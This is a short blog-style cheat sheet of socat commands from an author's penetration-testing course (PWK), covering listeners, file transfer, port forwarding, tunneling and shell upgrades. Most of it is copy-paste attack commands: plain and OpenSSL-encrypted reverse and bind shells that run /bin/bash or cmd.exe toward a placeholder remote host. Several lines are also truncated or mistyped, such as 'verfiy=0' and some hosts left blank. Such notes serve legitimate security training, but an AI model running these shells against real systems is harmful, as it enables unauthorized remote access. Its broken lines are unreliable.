


Table of Contents


I used socat heavily during pwk as it’s a powerful tool. In addition to the functionalities of netcat, with socat you can setup encrypted reverse/bind shells.
While all of this information is available in the help/manpages you still have to piece together what you want from the information provided in the documentation.
I like to approach things from a conceptual standpoint. So rather than play with syntax or reread documentation until it’s memorized, I like to prepare the commands I use most with a tool ahead of time and copy/paste them in a terminal.
This is particularly useful when time is of the essence or just for building a PoC in general.


Useful Switches

  • verbosity: -d
  • allow multiple connections: fork
  • do not verify ssl cert: verfiy=0
  • windows specific syntax: pipes
  • writing to tcp socket over ipv4: TCP4:<rhost>:<rport>
  • reading tcp socket over ipv4: TCP4-LISTEN:<port>
  • shells: EXEC:/bin/bash
    • windows specific syntax: EXEC:cmd.exe,pipes
    • windows specific syntax bash: EXEC:bash,pipes

Connecting To A Remote Listener Syntax

socat - TCP4:<remote server ip address>:portnumber`

As a side note, socat requires - to transfer data between STDIO and the remote host (i.e keyboard interaction)

Listening For A Connection

socat TCP4-LISTEN:<portnum> STDOUT

Root is required to bind a port below 1024.

File Transfers

Making file available for consumption

socat TCP4-LISTEN:<portnum> STDOUT

Root is required to bind a port below 1024.

Retrieving a file

socat TCP4:<remote ip>:<remote port> file:received_secret_passwords.txt,create`

Root is required to bind a port below 1024.


Reverse Shells

socat TCP4:<rhost>:rport EXEC:/bin/bash
  • windows specific syntax:
    socat TCP4:<rhost>:rport EXEC:cmd.exe,pipes
    socat TCP4:<rhost>:rport EXEC:bash,pipes

Encrypted Bind Shells

See ssl certificates certificates for creating a .pem file. target:

sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash


socat - OPENSSL:<remote ip>:443,verify=0

Encrypted Reverse Shells

See ssl certificates certificates for creating a .pem file. target:

socat OPENSSL:<remote ip>:<remote port>,verify=0 EXEC:/bin/bash


socat -d -d OPENSSL-LISTEN:<remote port>,cert=bind.pem,verify=0,fork STDOUT

Upgrading Reverse Shells

Listening Side:

socat file:`tty`,raw,echo=0 tcp-listen:4444

Target Side:

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:


Brittle port forwarding(Not session based)

This is most useful for exposing a service running on local host for example.
your machine:

socat -v TCP4:10000 TCP4-LISTEN:8000

target machine:

socat TCP4:<my ip>:10000 TCP4:<internal webserver>:<internal webserver port>

Local Tunneling

On a target we listen on port 12080 and forward traffic to port 8080, which presumably is behind a firewall or otherwise unreachable. So now from our attack box we can send to traffic to port 8080 via port 12080.

 socat TCP-LISTEN:12080,reuseaddr,fork TCP: &